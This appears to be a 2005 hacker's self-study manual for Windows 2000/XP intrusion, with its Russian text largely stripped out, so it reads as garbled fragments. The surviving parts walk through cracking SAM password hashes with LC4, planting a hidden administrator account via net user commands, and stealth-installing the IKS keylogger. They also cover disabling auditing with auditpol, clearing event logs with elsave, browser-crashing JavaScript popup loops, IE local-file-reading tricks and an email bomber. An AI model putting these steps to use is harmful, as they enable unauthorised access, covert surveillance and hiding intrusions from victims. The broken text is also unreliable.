Hacker's Self-Study Guide: A Detailed Illustrated Manual

Alex Atsctoy

004.056.53(075.8) 32.973.202-0878-1+32.973.2-018.278-1

Alex Atsctoy. : . . .: [, ] / Alex Atsctoy. .: , 2005. 192 .: . ISBN 5-93673-036-0. CIP

? , , - .

- : www.3st.ru E-mail: [email protected]

ISBN 5-93673-036-0

, 2005 , 2005 , 2005

1. 8

2. Windows ZOOO/Xf. . " 4. 5. fyay^epofc Web 6. 7. XaKUHflCQ

25 37 57 73 8399

8. Web~caumo&9. AmaKU'PoS

115143

. Windows 2000/Xf 11. 160 176 191

1. .............................................................................................. 8 ............................................... . .................................................. 9 - ? ................................................................................................... 10 ............................................................................................... 13 ................................................................................................ 16 ....................................................................................................... 16 ................................................................................. 17 ............................................................................. 75 Web ........................................................................................................... 19 Web ............................................................................................................ 20 ................................................................................................................ 21 ............................................................................................. 21 ................................................................ 22 - ....................................................................................................... 22 ................................................................................................................. 23 ................................................................................................................. 23

2. 231 WmdOMS 2OOO/XP. .............................................. 25 ........................................................................................................ 25 ............................................................................................................... 26 ........................................................................................................................... 27 Windows 2000/XP ................................................................... 28 SAM .............................................................................................................................. 29 ............................................................................................... 30 .............................................................................................................. 31 Windows 2000 ................................................................................ 33 ................................................................................................................. 35 ................................................................................................................. 36

.&.................................................? ................................................................................. 38 NTFSDOS Pro ...................................................................................................... 39 SAM .................................................................................................................. 44 .................................................................................... 47 ******** ............................................................................................. 50 ......................................................................................... 51 ............................................................................................. 52 ......................................................................................................... 53 ....................................................................................................... 53 ................................................................................................ .. 56

4. -

5758 59 63 66 68 69 70 72

5. & Web HTML Web-

7374 78 81 82

6.

8383 85 88 89 90 91 96 97

7. ICQ ICQ IP- ICQ- ICQ- ICQ ICQ-

99100 101 102 103 104 106 111 112 113

8. We|?~C3UmO& Web- Web- Web- IIS 5 Web- Teleport Pro HTML Web

115115 116 118 119 120 122 123 125 131 132 136 138 139 142

9. Ahl3KU " DoS !8 Smurf. Nuke Teardrop Ping of Death Land DoS

143144 145 145 147 148 149 151 752 154 154 755 155 756 159

10. Windows 2/. TCP/IP . 6

160 162 762 165 765

NetBus 168 169 173 175

. PhoneSweep 4.4 PhoneSweep 4.4 PhoneSweep

176177 178 179 180 782 185 186 186 190

1.

, - , , , , . , , . , ( ). !!! , , .. , , 2 () . . , : log: : 1: 2: em: e-mail . , ! . 13.06.1999, .. . !!! , http://www.super-internet-provider.ru , . , - , , , , , , , . , , , Web- .

- , . - , . , , , , , . - , , . - , , , . , , ! , , , . , , . - , 80- , , , , - , . .

, , , , . , , , . ( !), . - (-, !) , , . , , -

, . , , , , , , . , , , , , , - . , . , . , , , , , , , . , , , . , - , , , , . 20- - .

? , , , , , , - , - , , (, - ) , -

. , - , . , , . ( ). , : (, . ). , , , . Hard DISK [ Fdisk.exe] n- ( , ) . ! , , ! [ 24% ] , POWER - ! IDE- . , . , , , - , , , - , HARD DISK - , - , - , . , Must die, . Windows, , . , , . , Windows ? , , - ? , , , , .

, ? 21 ( ). : : , , , , , . , . : , . . , , , . : . . , . . , , . . : , . , ? - , , ? , ? , - . , , , , , ... . , , , (, , ) . , :12

- , 16 19 . ( 80%) , nerd. : 1) , ; 2) . (, ? - ). Windows Unix, TCP/IP , , C++, Perl, Basic. , . - , - 19- . , , , , . , , , . , , -, , . , , , . - , , , . , . , , - , - . . , , , . , . , , .

, , .. , . , , . , -

, , , . , , , , . , , : - .

, . , , , , , , [3]. , , , . , .

" , , , , . - - , . - , , , . , , , .

, , , , . , . , - , . , , , . , , (.. , ). , , , , , , . , , , , ( rootkit - ). - UNIX, Windows 2000 , 4, , , , , Windows, , . . IP-, . - . , - , , -, - , . , 4 - , , .

- , - . - , , . , DoS , IDS. . , .

, - , , . , , . , . ; , . - , , , , , . , , , . , [3] , . , , [3] ! [1]. , ( ). ,

, , - . , , , , , . , . , - , , . , . , , , . - .

. Web- (, RIPE NCC http://www.ripe.net). Web-, Whols, , , . , , , Web-. Yahoo (http://www.yahoo.com), Rambler (http://www.rambler.ru). . , , , , . , , , [3]. Google (http://www.google.com), . , , C:\WINNT, W i n dows NT/2000. - , .

, , Teleport Pro. , Web- , . , , HTML Web- - , , HTTP . , , , , , , , , ( 1 1 ). , Web- - , , . , .

, , , . . -, , , , .. , , . - SAM (Security Account Manager - ), . SAM - , 3 , , LOphtCrack LC4 (http://www.atstake.com). -, , , , Windows , MS Office . , . , 3 . Office Password 3.5 (http://lastbit.com/download.asp) Windows - , , . Revelation SnadBoy (http://www.snadboy.com). , 18

***** - , , - Revelation . , , , , , , . . - ? , , - , - .

Welo - . , Web-, , -. , Web, Web-, Web- , . Web- 5 . , . , Web-, . . , , 6 Death & Destruction Email Bomber - . , . , , , 6 Brutus.19

, , ICQ. - IP- ICQ- ( flood - ) ICQ- , ! - , 7 ICQ Flooder, ICQ-MultiVar, . - , IP- ICQ- ICQ, , . , .

WebWeb- , , , DoS, - . , IIS 5 (Internet Information Server - ) Microsoft . Web- , Web-, HTML . 8 , , CGIScan Brutus, IIS . 9 , DoS. Web- , , Web-. , DoS , - , . Web , , CGI-. , , .

TCP/IP , , , , IP-, , . , . 10 - SuperScan, foundstone_tools (http://www.foundstone.com). W2RK (Windows 2000 Resource Kit - Windows 2000), , W2HK (Windows 2000 Hacker Tools - Windows 2000). , , , .

flepex&am , , . , , - , . , . , , . - . , , , , . - SpyNet, .

, , VPN (Virtual Private Network - ) , , - . , , , , , .

, W2RK ( Windows 2000) W2HK - Windows 2000, . Windows (Explorer) Windows, . , , , password, . [3], , , , . , , , password.txt , ISP. , , . , NTFS Windows 2000/XP, , , PGP Desktop Security.

11~ - , , .. . Web- , (., , http://www.securitylab.ru). 8 IIS. CGIScan , . , 22

- , , IIS 4. Web , . - , , . . , ; , , - ( ). , , - -, , - .

- , . - , . 10 NetBUS, . , . - , , , . . - , , . , , - - , , ... , , .

- , , , , . , , ( ), , ? , , -

, , ? , - ? , , ( ), , , , - . , . . , , , , . , , . , , , , .... , , - Windows 2000/XP.

2.

Windows /Xf Windows 2000 TCSEC (Trusted Computer System Evaluation Criteria - ) . , Windows 2000, , . . . .

.

. , - , , , , , .. , - . , ( log in - ), - , . , , , , . Windows NT/2000/XP SAM (Security Account Manager - ). SAM , , . SAM - , 3 . , . , , , . , -

, , . , , , .., , , , . , , -, (, , ) , , , . , , , , . Windows NT 4 NTLM (NT LAN Manager - NT). NTLM Windows 2000/XP. NTLM, , LM (LAN Manager - ), , Windows NTLM. Windows 2000/XP Kerberos, , , . - Windows 2000/XP, - Windows 2000 Kerberos. - , Windows 2000/XP - . , , , , - .

, , , . - . Windows , , , . , , . , , , , , .

Windows 2000/XP , Windows NT/2000/XP . , . , , . , , . , (Guest), , - (User), . , , , . , (Administrators), , - , , ...

urn, , . , , - , .. , . , , . , , , , , . Windows NT/2000/XP, , , - . , 4, , , . , , , , ,

, , . , 11 , , . , , [2], [6], , - Windows 2000/XP, , .

Windows 2OOO/XP Windows 2000/XP SRM (Security Reference Monitor - ). SRM Windows 2000/XP, .. . Windows 2000/XP , , SRM. . LSA (Local Security Authority - ), , , LSA. , LSA . , LSA , . SAM (Security Account Manager - ), . , LSA. AD (Active Directory - ), AD . , LSA. , , : , , Kerberos; , . , , , : , , 28

Windows 2000/XP , /, . SAM AD , LSA . , , , .. , SRM. , , Windows 2000/XP. , . -, (SAM AD); -, . , .

SAM, , , , . , , , SAM AD, . SAM %%\5132\\5, AD - %KopHeBoft_KaTanor%\ntds\ntds.dit. , , , - ! . , , , , , Windows 2000/XP. SAM Windows NT 4 , NTLM , , , LM, Windows. LM , SAM , , LOphtCrack (http://www.atstacke.com) , . LOphtCrack SAM, , , pwdump (http://www.atstacke.com). Windows - pwdump SAM , LOphtCrack, - , LM - .29

Service Pack 3 Windows NT 4, , Syskey () , SAM. Windows NT 4 Syskey ; Windows 2000/XP Syskey . LM NTLM Syskey , . , - , 3-4 , . , 1 Microsoft, - Microsoft! Windows. , , .

Windows 2000/XP , , , , , ? . , , Windows, SID (Security IDentifier), 48- , . Windows 2000/XP SID, Windows 2000 SID. . , , ? (, ..) Windows ACL (Access Control List - ), (Access Control Entries - ). SID . ACL

Windows 2000/XP , , (Explorer) Windows, Windows 2000/XP. ACL. Windows 2000/XP (, ) LSA , SID 8 , . , , SRM 8 ACL , , . , , - . , , - , . , . - ACL , Windows 2000/XP . , (, http://www.rootkit.com). , ACL ! , - , ? , . , , Windows 2000/XP.

Windows NT 4 , .. , Windows 2000/XP ADS (Active Directory Services). ADS Windows 2000, Windows 2000 Server. , , . - , , , , - ADS , , .. . , , IP- .

ADS , , - , . OU (Organization Units), , , , , , , , OU. OU - , .. OU , OU . Windows 2000/XP , . , . Windows 2000 , - , Windows 2000 Windows NT. , , . Windows 2000/XP , . , , . , .. . , . , domen. : com*!.domen, comp2.domen... , , , , domenl, domen2,... , , . , domenl domen2 , domen2 domenl, domen2 comp1.domen2.domenl, comp2.domen2.domen1, ... compN.domen2.domen1. domenl domen2 , forest, . , domenl compl.domenl.forest, comp2.domen1.forest , domen2 compl.domen2.forest, comp2.domen2.forest, .... .

Windows 2000/XP , - , : . (Universal group), , , . (Global Group), , , . (Local group domain), , . ACL . - . , , AD, , , . - AD SAM, , SAM. AD , AD, , ( 10 ), AD , , , . , . , , , Window 2000, . , , LC4 LOpghtCrack . , , - - .

Windows 2000 Windows 2000 , . - , 332 - 5830

, -, , . -, , , [7], , . - , , - , . . - , - , AD. - - , - -. - , . . -, - . -, , - , , , , . , , , . . - , , , LM, - LM ( , , [3]). Microsoft NTLM ( Service Pack 3 Windows NT 4) NTLMv2 ( Service Pack 4 Windows NT 4). , , Windows 2000 Kerberos, - , . . , Windows 2000/XP Windows , LM. Windows 2000/XP Kerberos, NTLM LM.34

Windows 2000/XP - TCP- 88 , Kerberos, . - LM NTLM, LOphtCrack . , - , . , ?

, , , . , , . , . , , , . , . , , Windows 2000. , Microsoft , , . Windows XP Windows. Windows 2000/XP [7], . , , , . , , Retina, [7].

-, . -, , , VPN (Virtual Private Network - ). VPN , . VPN , . , , , , (Bruce Schneier), (Applied Cryptography), - . , - , , . - , .. .

Windows 2000/XP , . SAM, LSA, SRM, ADS, LM, NTLM, Kerberos . Windows, . Windows 2000/XP, / ADS , Microsoft Press Windows 2000.

3

& Window 2000/XP, , , , , ? , 2, , , , . . ( , - . .) - , . , , , ( - ...). , , . , , , , , , ( - ). ? , - , . - . , . , - , - . , . -, , - - , Windows. , , , , . , , ,

(. 1), - , . - , , , - -. -, , , Windows BIOS . , Windows 2000/XP .

, - (, ). , , - MS-DOS ! - , . -, BIOS , BIOS . . -, BIOS , NTFS, Windows 2000/XP. , MS-DOS - - , - . , -, , ( - - , ! , . , , ), Windows 2000/XP. - NTFSDOS Professional (http://www.winternals.com) Winternals Software LP, NTFS MS-DOS. , , Windows 2000/XP . - , . NTFSDOS Professional - .

1515 fro NTFSDOS Pro . Windows NTFSDOS Professional NTFSDOS Professional Boot Disk Wizard ( NTFSDOS Professional). , NTFS. . , FORMAT/S SYS MS-DOS. Windows XP Create an MS-DOS startup disk ( MS-DOS). > * NTFSDOS Professional (Start Programs NTFSDOS Professional). (. 3.1).

wizard will help you install Windows NT/2000/XP system files needed for NTFSDOS Professional to run from a MS-DOS diskette or hard disk

PMC. 3.1. NTFSDOS Pro > Next (). (. 3.2), , . > , Next (), . NTFSDOS Pro MS DOS ( 437). (. 3.3) .

NTFSDOS Professional Boot Disk Wizard copies drivers and system files from an existing Windows NT/2000/XP installation or CD-ROM to your hard disk or a pair of floppy diskettes. If you wish to create bootable diskettes you must add MS-DOS to the diskettes yourself, either before or after using this program. Use the FORMAT/S or SYS commands from a MS-DOS shell to make bootable diskettes. You can also make a bootable diskette on Windows XP by opening My Computer, selecting the "Format" option from the context menu of your diskette drive, and formatting a diskette with the "Create an MS-DOS startup disk" option checked.

. .2.

NTFSDOS Pro uses the character set for the United States version of MS-DOS (code page 437) by default. Select any additional character sets you use with DOS.
Japan, code page 932
Korean (Johab), code page 1361
Korean, code page 949
MS-DOS Canadian-French, code page 863
MS-DOS Icelandic, code page 861
MS-DOS Multilingual (Latin I), code page 850
MS-DOS Nordic, code page 865
MS-DOS Portuguese, code page 860
MS-DOS Slavic (Latin II), code page 852

. .. > Next (). NTFSDOS Pro (. 3.4). Windows NT/2000/XP, NTFSDOS Pro. , , C:\WINNT, \I386 Windows NT/2000/XP, - Service Pack. > Next (). NTFSDOS Pro (. 3.5).40

Pro uses copies of several files located in your Windows NT/2000/XP m directory. Specify the name of your Windows NT/2000/XP installation directory, or a directory containing the required Windows NT/2000 system files. |c\ASFRool

Finish (), . NTFSDOS Pro, . NTFSDOS Pro . , , NTFSPRO.EXE, NTFS . , , MS-DOS , FAT FAT32, NTFSDOS Pro . MS-DOS NTFS, Windows 2000/XP . , ( - ), , , . , - , , , . , , , . - SAM, , , _/132/1'|.

5 SAM, SAM. NTFSDOS Pro, MS-DOS SAM /KOpeHb_CMCTeMbi/system32/config . - , , LC4 - LOphtCrack (http://www.atstake.com). . 3.9 LC4 Import ().

IB?!

Import | Senion

Help

Import From Local Machine Import From Remote Registiy.. Import From SAM File... Import From Sniffer... Import From .LC File... Import From .LCS (LC3) File Import Frum PWDUMP File...

I File * New Session ( * ). , . 3.9. > Import Import From SAM File ( * SAM). SAM. > SAM, 1-3. > (. 3.10) Session Begin Audit ( ) .44

?l@stakeLC4 -(Unlilbdll File View Import Sestion Help

.i u_u empty ' empty ' empty ' empty ' amply " empty '

* \ ft \ ' empty '

IALEX- (ALEX-lALEX-3 lALEX-3 lALEX-3 [ALEX-3

lALEX-3

Administrator ASPNET Guett HelpAssittant IUSH_ALEX-3 IWAM_ALEX-3 NewUzer

Od Oh Qm us

e.;

i asCS

mporled 7 accounts

Puc. 3.10. SAM , , SAM, . , . 3.11, SAM.

Adnuniitialoi ASPNET Guel HelpAti.tlonl IUSH.ALEX-3 IWAM.ALEX-3 NenUter

. 3.11. SAM ! , - 007 , , . , , 5 Pentium 2 400 . 45

- , LC4 . LC4 Auditing Options For This Session ( ), . 3.12.Dictionary Crack D Enabled Dictionary List [

The Dictionary Crack tests for passwords that are the same as the words listed in the word file. This test is very fast and finds the weakest passwords. Dictionary/Brute Hybrid Crack El Enabled |0 3 Characters to prepend I Characters to append

Common letter substitutions (much slower) The Dictionary/Brute Hybrid Crack tests for passwords that are variations of the words in the word file. It finds passwords such as "Dana99" or "monkeys!". This test is fast and finds weak passwords. Brute Force CrackEl Enabled D Distributed Character Set |A-ZandO-9 Custom Claraclw Set ch ch*:ttrt

The Brute Force Crack tests for passwords that are made up of the characters specified in the Character Set. It finds passwords such as "WeR3pll6s" or "vC569t12b". This test is slow and finds medium to strong passwords. Specify a character set with more characters to crack stronger passwords.

Puc. 3.12. , LC4 : Dictionary Crack ( ), Dictionary List ( ), . LC4 , , . , , , , , .., . Dictionary/Brute Hybrid Crack (/ ), , / , , . Password???, .

Brute Force Crack ( ), . , . Character Set ( ) , Custom (), Custom Character Set (List each character) ( ( )) . Distributed () . File Save Distributed ( ) . LC4 Windows NT/2000/XP. Windows, Windows 95/98, Pwltool.

' Windows , , . MS Office (http://www.elcomsoft.com), - OfficePassword 3.5. , , ******* Revelation SnadBoy (http://www.snadboy.com). , , AZPR , Passware Kit, http://www.lostpassword.com. Windows - , /, , , Window - OfficePassword .

OfficePassword 3.5 OfficePassword 3.5 Lotus Organizer, MS Project, MS Backup, Symantec Act, Schedule+, MS Money, Quicken, MS Office - Excel, Word, Access, Outlook, ZIP VBA, MS Office. OfficePassword 3.5 . Word password.doc, - ? , Windows, password.doc, (. 3.13). - , OfficePassword 3.5 : > OfficePassword (Start Programs * OfficePassword). OfficePassword (. . 3.14).Password Enter password to open file : \test\password . doc

II[ OKCancel

1

Puc. 3.13. WordI OfficePassword "DEMO" File Took Option* Help

1-]

Selecl documentYou can also diag-and-drop files from Internet Explorer onto this window. > (c) 1998-2001 Vitas Ramanchauskas. LastBit Software Select document ( ) Windows MS Office. , Word . , MS Word . , - OfficePassword 3- .48

- , . > , Select recovery mode ( ), . 3.15.Select lecoverv mode Jocument path: C:\test\passwotddoc (Word) Version : Wotd 8.0+ ntemal version: 133 Word language : Russian (0419) incryption type: Strong Text size : 537 Preview Automatic OflicePassword automatically selects most suitable recovery options. Recovery may take a lot of time (up to several months in case ol a long password]. About 80% of all passwords could be recovered within 48 hours. Use guaranteed recovery otherwise. User-defined Adjust settings to optimize search for specific case. (This option is for advanced useis only.) Guaranteed recovery Success is guaranteed! Important: please read the documentation. Additional fee may apply. I Click here to learn

Puc. 3.15, > Select recovery mode ( ) : Automatic ( ), , Next (), , . User-defined ( ), . . Guaranteed recovery ( ), , , , . > NextlOlficePasswoid 'DEMO* Password found: '007' (without quotes) The password has been copied onto the clipboard Would you like to open the document now?

Puc. 3.16. !49

(). , , (. 3.16). OfficePassword 3.5 , , . - , . , - , . , , 24-28 , . , , . , , - , .

******, - , , (, ), , ******. , , , . - , , , . , . , -, . , , NetBus . . 3.17 Revelation Snad (http://www.snadboy.com) NetBus NetBus.

* SnadBoy's Revelation 'Circled V Cursor Drag to reveal password | Check For Update) | About

Exit I Copy to clipboard

Text ol Window Under 'Circled V Cursor (il available)

007Status Revelation active. Length of available text: 3

Reposition Revelation out of the way when dragging 'circled V When minimized, put in System Tray

Always on top Hide 'How to' instructions

i SWORD-2000 iMycq Change Hoct "Host information-

^

How to 1) Left click and drag (while holding down the left mouse button) the 'circled V

2) As you drag the 'circled +' cursor over different fields on various windows, the text in the field under the cursor will be displayed in the 'Text of Window...' box. 3) Release the left mouse button when you have revealed the text you desire. NOTE - If the field contains text hidden by asterisks (or some other character), the actual text will be shown. In some cases the text may actually be asterisks. NOTE - Not all of the fields that the cursor passes over will have text that can be revealed. Check the status light for availability of text. Bright green - text available (See 'length of text:' in Status area) Bright red - no text available

Destination: |SWORD-200 Host name/IP: 1.0-0-1 TCP-port: User name: |Administrator Password:

Puc. 3.17. NetBus Sword-2000 ! Revelation . 'Circled+'Cursor ('+') SnadBoy's Revelation ( . 3.17 Password ()). Revelation, Test of Window Under Circles and Cursor (if available) ( ( )) ( ). . 3.17, 007 NetBus Sword-2000, ( ). ( NetBus) [11].

- , - , - , , - . : .51

, 4. - , , , . , , , . - , backdoor - , , .

&* , , , , . MS-DOS: NET USER /ADD, , NET LOCALGROUP /ADD, . . 3.18 .r^JCommand Prompt

- NewUser 00 /add
The command completed successfully.
C:\>net localgroup Administrators NewUser /add
The command completed successfully.

Puc. 3.18. NewUser NewUser , , . , , .

- , . Windows - Startup Document and Settings ( ) , . Startup, All users, . , , . , (), . IKS (Invisible KeyLogger Stealth - ), - http://www.amecisco.com.

- , . - , , . IKS - http://www.amecisco.com, Invisible KeyLogger 97 8 10 , . Windows NT/2000/XP, , , 1^' l+ir^n+l0"8"]. IKS Windows NT/2000/XP. , IKS , . IKS . Web- iks2k20d.exe , . 3.19.

D Standard Install | p Stealth Install | D Uninslall |

It's recommended that you use Standard Install if this is your first time in using IKS. Just accept the defaults and click on "Install Now" button. Or you can click on 'Read readme M" to get familiar with the concept of IKS first. During a standard installation a program directory will be created; program files will be placed in the directory. An icon to the log file viewer will be placed on the desktop. No file renaming (stealth features) will take place. Install Directory |C:\Program Files\iks You need to have administrator rights on this system for it to install successfully.

If you want to uninstall in the future, just run this program (iksinstall.exe) again, click on the "Uninstall" tab, then "Uninstall Now" to automatically uninstall the standard installation.

Read readme.M

. 3.19. IKS Install Now ( ) - . IKS . , IKS , iks.sys, . , dataview.exe, . 3.20.Settings Help

0 Filter Out Arrow Keys D Filter Out Ctrl and Alt Keys Rtter Out F1 to FT 2 Keys Filter Out All Other Function Keys Import Binary Log From:

Use Notepad Translate to Text Only Gear La a Clear Binary Log Upon Exit 0 dear Text Log Upon Exit

Save Text Log To: C:\DOCUME~1\ADMINI~1.000\LOCALS I Browse,

Puc. 3.20.

Go! () , . . 3.20 , , . , IKS , . iks.sys KOpeHb_CHCTeMbi/system32/drivers, ( Regedt32 . 3.21).Registry Editor [HKEY LOCAL MACHINE on Locnl Mnchi Registry Edit Tree View Security Options Window SGemuwa SGpc &I37DRIVER CEJIAS ICQ Groupware COIISADMIN IPMksl CD ILDAP QIMAP4D32 GDIMonitor inetaccs Cllnetln(o Inport Help

Start: REG_DWORD: 0x3 Type: REG_DWORD: 0x1

Puc. 3.21. Windows (, The Cleaner, ). IKS, Stealth Install ( ) (. 3.19) - , calc.sys, (, - - ). IKS . 007 Stealth Monitor, Web-, , , . - Windows, - , , notepad.exe.

, BIOS, . , . , , . , - , , , , ( ), , , . - , , . Windows 2000/XP . Windows 9x/Me, - , PGP Desktop Security, . Windows 9x/Me , . , , , , - ? . .

4.

- , , , . , , , , , - , , , . , , - , , , . , - . 1 , 50% , - , , . , , , . , ,- , , . , ( ). , - ( ). , . , - , , , . .

, , , . , , , - . , privacy - . , , , , , , , . , [10], (, ) , - , - privacy. , , , , , , - , . . , , , , , . , . . -, . , , . , , , - , . -, . . , Web- , Web, . , , ,

(, ).

, , - , , - . , ? , , . : , . , Web-. , - . , . Windows, (Explorer) , . , Windows. , MS Office. , , , . ? , .

. , , (Explorer) , . , (Delete) Windows , , . Windows , , , , , MS Office. , , (Show hidden files and folders) 59

(Folder Options) Windows. * (Tools * Folder Options) (. 4.1).)0 j

| | j

I

(

. | | |

: " " ; D 0 0 () Q Q - , / " 004.tmp |~WRL1120.tmp ~WRL19B2.tmp |~WRL3531.tmp

| |

Puc. 4.2. , , - ., .WBK, 60

, ~$. , , , Windows, , , Windows. , - , , . ? , MS Office, , , , Norton Utilities. - Cleaner Disk Security (http://www.theabsolute.net/sware/index.htmlttClndisk).

, , , . , . , , . - , , . ( 100%) . . 4.3 Clean Disk Security 5.01 (http://www.the-absolute.net/sware/ index.html#Clndisk), , ( ). Clean Disk Security 5.01 Erase fully ( ). , , - . 4.3. Clean Disk Security 5.01 ( 61

FAT NTFS). , , . Windows, Windows, Temp ( , , ) . -, , , (cookie). , (. 4.3). . 4.3, : Simple () - 6 , . ; 1 . NIS - 7 (.. ) . Gutmann - 35 (.. ). (Peter Gutmann) . . , ( ). Test mode ( ) - #10 ASCII. . , Clean Disk Security 5.01 , , . , [10]. - , : (UPS); . , , . , .

, , . , , . -, , , . , . , , , Norton Utilities, , / , . , , [10]. ( ) - , , regedt32. . , , NTFS.

, , , - . , - - Web- . , , . . , , .

& , , . . , .

, . (). , , , . ( Web-, , , ), , , , . , , . (., [5], [10], - , , ). , -, . , , , . , -. -, , . . , . , , , . -, - , ! - , , , . , , !!!

Web- , 64

. HTML- Web-. Web- , , Web-, . , , Web- http://www.privacy.net/analyze, , Web- . . 4.4, , Web-, - .3l Analyze Your Internet Privacy - Microsoft Internet Explorer ^ ^ " ^ ^ ^ ^ ~ ^ ^

Your Browser Type and Operating System: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler) All Information sent by your web browser when requesting this web page: Accept: */* Accept-Language: ru Connection; keep-alive Host: www.privacy.net UserAgent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler) Cookie: Date=1/30/2002; Privacy. net=Privacy+Analysis Via: 1.1 cea15. 1.1 proxy.iptelecom.net.ua:3128 (Squid/2.4.STABLE3) X-Forwarded-For: 212.9.232.151, 212.9.224.89 Cache-Control: max-age=259200

. 4.4. Web- , ( ) Whols, 1, . , - , IP- . Web- Web- , IP- - ...

, , Web-, ( anonymizer - ). , Web-, , . , , http://www.anonymizer.com. (. 4.5).Anonymizer.com -- Onlinu Privacy Sorvic 4- - - 1 | U [ ife-r ^ " hup.//wwwanonymteBf.coin.

Anonymizer.com(| AboutPrivacy'

FIND IT STO

S

spyCap " '"

:

. 4.5. Web- Go. - , - FTP-, , , . , , , Web-, , . ( ), .

Web -, - (Proxy server) (. 4.6).

- '" . , D Q 0 - : |www.anonymize| ; J8080 [...!

D - - : : :

1 1 1

|

. 4.6. - - , , , .. Web- -, . - . - HTTP, FTP-, Web-, FTP. - , . - . - . , , , Web-, , Yahoo. proxy+server+configuration+Explorer, Web-, , -. - , , .

, , , , , , , . , , , 3 IKS. , , NetBus (http://www.netBus.org). , , , , , . : - , ( - ). IP- , -, . , , . , Back Orifice 2000 31337 , , 31336, , , . , Windows NT/2000/XP. , auditpol W2RK, - , , elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm). (Event Viewer) Windows 2000/XP. , , (Hidden). Windows, . , . , 68

, , explorer.exe, Windows Windows. , EliteWrap, [11]. ( Rootkit - ). , , . . Tripwire (http://www.tripwiresecurity.com), , Cisco Systems (http://www.cisco.com) . Windows 2000/XP , , , [7].

, , , - , . , / . Windows NT/2000/XP, , auditpol.exe W2RK. ( ) , . :

C:\Auditpol>auditpol \\ComputerName /disable
Running...
Audit information changed successfully on \\ComputerName ...
New audit policy on \\ComputerName ...
(0) Audit Disabled
System                   = No
Logon                    = No
Object Access            = No
Privilege Use            = No
Process Tracking         = Success and Failure
Policy Change            = No
Account Management       = No
Directory Service Access = No
Account Logon            = No

//ComputerName - , /disable . auditpol.exe - , , , , ( auditpol /? ).

Windows 2000/XP : > (Start) (Settings Control Panel).File Action View Help

Event Viewer [Local] I Type I Description Application Error Record! I Sire 512...

Delete all records n the log

Puc. 4.7. Windows70

(Control Panel) (Administrative Tools). (Event Viewer). Event Viewer ( ) (. 4.7). (Security Log); . Clear all Events ( ). , . 4.8, .

Do you want to save "Security" before clearing it? Yes No Cancel

Puc. 4.8. > (No), . . , - ! , - . , elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm). , , Windows NT 4, Windows 2000. . C:\els004>elsave -s \\ComputerName - -s , - . , . elsave /? , . , elsave.exe . - elsave.exe Windows ( (Start), AT MS-DOS). System, .71

- ( , - ). , , . , , , , . - ! 50% ( - !) - ! - , , [9]. , , Norton Personal Firewall, PGP Desktop Security . , , , .

5

# , , , , . , , , , , . , 90- , . , , . , , , . , , , TCP/IP. - , . - , , . , . , , , (, ). , . , , , , Word .., , , , . WWW (World Wide Web - ), Web (). Web - , Web . - 1961 , Web 1992 . , , -

. Web - Web , , Web. Web . Web, Web URL (Uniform Resource Locator - ), Web. , Web HTTP (Hyper Text Transfer Protocol - ). , Web, HTML (Hyper Text Markup Language - ). , , , - HTML CGI HTTP. Web , , Web, , - , , - 1 Web . Web , , Web - HTML Web, ( browser, , , ), Web Web-.

HTML - Web, Web, , , , , , , , , . , HTML , Web, , Internet Explorer (ffi) Netscape Navigator (NN).74

Web : Web - , HTML Web , , , HTML, , - Web? - HTML? . ( ) , , Web-.

, DoS , Web . , , Web, , . open ( ) , JavaScript MainPage.html , HTML 8. 1. 8.1. HTML Web- < SCRIPT LANGUAGE* " JavaScript " > generation () ; function generation () { var d=0; while (true) { a = new Date; d = a.getMilliseconds( ) ; window. open ("MainPage. html", d, "width=250, height =250") ;

HTML, , . Windows 2000/XP IE 5 IE 6 HTML, .

IE 5 IE 6 .

tlep - . , 8.2 ... ( ). 8.2. HTML Web- var p = external.... ; HTML 8.2 IE 5 6 var p 8.2. ( [3], [10]). , , - HTML .

[3] HTML, CLSID. 8.3. HTML, . 8.3. HTML 8.3 IE 6 , . 5.1.

WebJQ C:\Documenl. and Selling*\Alex4Mj> DocuroenUSWork D... [)11

. 5.1. HTML C:\Windows\ system32\calc.exe, , .

Web- , JavaScript, HTML- Web-, . , IFRAME, Web- . 8.4 HTML, , C:\security.txt. 8.4.

Web- _

C:\security.txt

alert (" : \n " +b . document . body . innerText ) ; 77

II.navigate("file://:/Security.txt"); setTimeout('Il.navigate(nfile://C:/Security.txt")',1000); 8.4 IE 5 IE 6 , . 5.2.

. 5.2, security.txt - - Web-. , , , JavaScript . 5.2. Web- . Web- NavigateComplete2, [3].

C:\security.txt

Web-caumo& Web, , , - Web- . , Web- ActiveX, . , , , , , , -, - .. - , , . , - .78

Web - , - Web-, . , , . , Web - . , Windows Web- Microsoft NetBus. Web-, . Web , . 8.7 HTML, -. 8.7. HTML Bubliki&Baranki !!!!! - (Address) , , , , . IE Address Javascript. URL HTML IE 6, ; , IE 6 HTML . ! , , Web- - . , , , .

, , , , Web . . , , , Web. , Web- . . -, , ,

, . . , , . - Web-, - , . : . , , SSL. Web- . . , , , . . , . , , , , . .

Web - . , . , , , , Web . , - Web , , - , , . , , 4 IE Netscape, , 5 6 . , , .82

6.

, , , , , . , . , , . , , , , , ... , - !

- (, , , 1, ). , , , ! , . ? - - - . ( Flood - , ) ( Spam - , . Spam ). (.. ), , , . , -

SMTP-. Death & Destruction Email Bomber ( & ) 4.0, DnD (http://www.softseek.com/Utilities/VBRUN_Files/). , . , DnD, . Avalanche - Avalanche DnD, . . 6.1 DnD 4.O.Death and Desliuclion 4.0 File Clones Header Session Random Lists Mailing Lilts Window Extras Help

-Email Bombing is rarely damaging to the target but is always damaging to smtp hosts. I do NOT condone mailbombing as it causes problems for SysAdmins of servers. I did not make this program for people to blast away at each other. PLEASE use it responsibly, and if you HAVE to email bomb, then please use the option to randomly switch servers in between messages; as it lightens the loads on the server. Have fun and don't ruin a good sysadmins time by flooding his server!


Puc. 6.1. DnD DnD, , 1-1. , ( ). . .84

DnD Settings (), DnD (. . 6.1). DnD Settings () : > SMTP Host ( SMTP) , SMTP-, . SMTP Sword-2000.sword.net. > Spoof Host ( ) , . , . Randomly Change ( ) , SMTP-. > SMTP-, Edit Server List ( ). Random Server List ( ), . 6.2. Random Servei List ^orca.esdIH.w | |mw.highway1.c| |intetconnect.ne| lhorizQns.net stjohns.edu ] Imalasada.lava. | lpressentef.com | |cyberhighway.n| |widQwmaker.co| Iclubmet.mettob | j jcabletegina.co | J |maple.nis.net |


Puc. 6.2. SMTP-

